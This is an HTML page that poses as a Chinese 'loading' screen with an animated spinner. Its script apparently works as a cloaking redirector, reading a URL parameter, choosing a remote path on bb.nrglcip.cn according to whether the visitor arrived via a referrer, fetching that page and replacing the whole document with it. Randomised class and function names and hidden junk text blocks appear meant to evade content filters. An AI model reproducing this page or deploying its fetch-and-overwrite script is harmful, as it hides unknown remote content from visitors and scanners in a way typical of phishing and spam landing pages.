<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .f5ojavIFTU {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .f5ojavIFTU .JPHI0Ba {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .f5ojavIFTU .content {
            line-height: 50px;
            text-align: center
        }

        .f5ojavIFTU .img {
            width: 100%
        }

        .f5ojavIFTU .IMntSGHfK {
            text-align: center
        }

        .f5ojavIFTU .IMntSGHfK span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .f5ojavIFTU .IMntSGHfK span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .f5ojavIFTU .IMntSGHfK span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .f5ojavIFTU .IMntSGHfK span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .f5ojavIFTU .IMntSGHfK span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .f5ojavIFTU .IMntSGHfK span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .f5ojavIFTU .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function topwNPNk4(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var NPaIp = topwNPNk4('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ NPaIp +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ NPaIp +".html?a=share";
		}
		
        yT5QQ4CDl=url+"#"+new Date().getTime();
        yT5QQ4CDl && function() {
            $.get(yT5QQ4CDl, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<p  style='display:none'>Z3YnhmICicADK2MTa2</p>
<p  style='display:none'>Z3YnhmICicADK2MTa2</p>
<b style='display:none' >nzhHXaWAeOvNaS91al63Dq</b><div class="f5ojavIFTU">
    <div class="JPHI0Ba">
        <div class="IMntSGHfK">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<b style='display:none' >hgiws2kILaJ3MtMVm0sbfxiJJzn51D6y8enLRYGlZrtLUTwxhHVSxMNGv4w2c9s5CPrOhHpruD1nOiBFUijHZW4z4RAPR</b>
<ul style='display:none' >MiXIJ23CVFGDFILNvFHQlFHCZneaIM1pmXfOSuavKfBWgLBqbn3FZOpI4nyGxeDEwS37ocVmOuZeIy5i</ul>
<b style='display:none' >hgiws2kILaJ3MtMVm0sbfxiJJzn51D6y8enLRYGlZrtLUTwxhHVSxMNGv4w2c9s5CPrOhHpruD1nOiBFUijHZW4z4RAPR</b>
<p  style='display:none'>MGG0UpO0LKidMltnZI15qDCdLGDqnqejMnHRqzY5WxNNuk3EVHVifFmQUkxjTF</p>
<p  style='display:none'>MGG0UpO0LKidMltnZI15qDCdLGDqnqejMnHRqzY5WxNNuk3EVHVifFmQUkxjTF</p>
<li style='display:none' >qzSDN4RgAlJAELKxocfp1E6Gu8XkgzU</li>
<b style='display:none' >hgiws2kILaJ3MtMVm0sbfxiJJzn51D6y8enLRYGlZrtLUTwxhHVSxMNGv4w2c9s5CPrOhHpruD1nOiBFUijHZW4z4RAPR</b></body>
</html>